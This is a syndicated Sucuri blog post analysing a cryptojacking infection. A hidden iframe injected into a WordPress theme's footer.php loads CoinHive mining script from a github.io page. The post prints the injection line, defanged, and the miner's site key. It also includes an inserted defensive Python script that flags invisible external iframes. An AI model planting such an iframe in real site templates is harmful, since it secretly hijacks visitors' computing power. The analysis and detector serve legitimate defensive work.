Malicious Cryptominers from GitHub

Recently, a webmaster contacted us after his AVG antivirus reported the JS:Miner-C [Trj] infection on his site.

Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:

<iframe src="hxxps://wpupdates.github[.]io/ping/" style="width:0;heigh:0;border:none;"></iframe>

When we opened the URL in a browser, the page was blank.

After checking the HTML source code, we discovered a piece of JavaScript that used the CoinHive miner with the site key CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username MoneroU.
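
A defender-side check for the injection pattern described above, as an added example that is not part of the original post: it scans theme source for iframes that are styled invisible and load from a third-party host. The sample footer, the example.net and example.org hosts, and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
ZERO = r"0(?:px|pt|em|rem|%)?"
# A declaration that collapses or hides the element. width:0 alone is enough,
# so a misspelled second property (as in the sample) does not matter.
HIDING_CSS = re.compile(
    rf"(?:^|;)\s*(?:(?:width|height)\s*:\s*{ZERO}|display\s*:\s*none"
    rf"|visibility\s*:\s*hidden)\s*(?:!important\s*)?(?:;|$)", re.I)

def parse_attrs(tag):
    """Map attribute name -> value for one tag (quoted or bare values)."""
    return {m.group(1).lower(): next((g for g in m.groups()[1:] if g is not None), "")
            for m in ATTR.finditer(tag)}

def is_hidden(attrs):
    """True if inline style or width/height attributes make the frame invisible."""
    if HIDING_CSS.search(attrs.get("style", "")):
        return True
    return any(attrs.get(k, "").strip() in ("0", "0px") for k in ("width", "height"))

def find_hidden_iframes(source, own_hosts=()):
    """Return (line, host, tag) for every invisible iframe with an external src."""
    findings = []
    for m in IFRAME_TAG.finditer(source):
        attrs = parse_attrs(m.group(0))
        try:
            host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        except ValueError:  # malformed src: no host to attribute it to
            continue
        if host and host not in own_hosts and is_hidden(attrs):
            findings.append((source.count("\n", 0, m.start()) + 1, host, m.group(0)))
    return findings

# Constructed sample of a theme footer.php: one visible embed, one hidden frame.
SAMPLE_FOOTER = """<footer>
<?php wp_footer(); ?>
<iframe src="https://video.example.org/embed/1" width="560" height="315"></iframe>
<iframe src="https://miner.example.net/ping/" style="width:0;heigh:0;border:none;"></iframe>
</footer>
"""

if __name__ == "__main__":
    for line, host, tag in find_hidden_iframes(SAMPLE_FOOTER):
        print(f"footer.php:{line}: hidden iframe loading {host}: {tag}")
```

Pass the site's own hostnames in `own_hosts` so that legitimate hidden frames served by the site itself are not reported.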

*** This is a Security Bloggers Network syndicated blog from Sucuri Blog authored by Denis Sinegubko. Read the original post at: https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html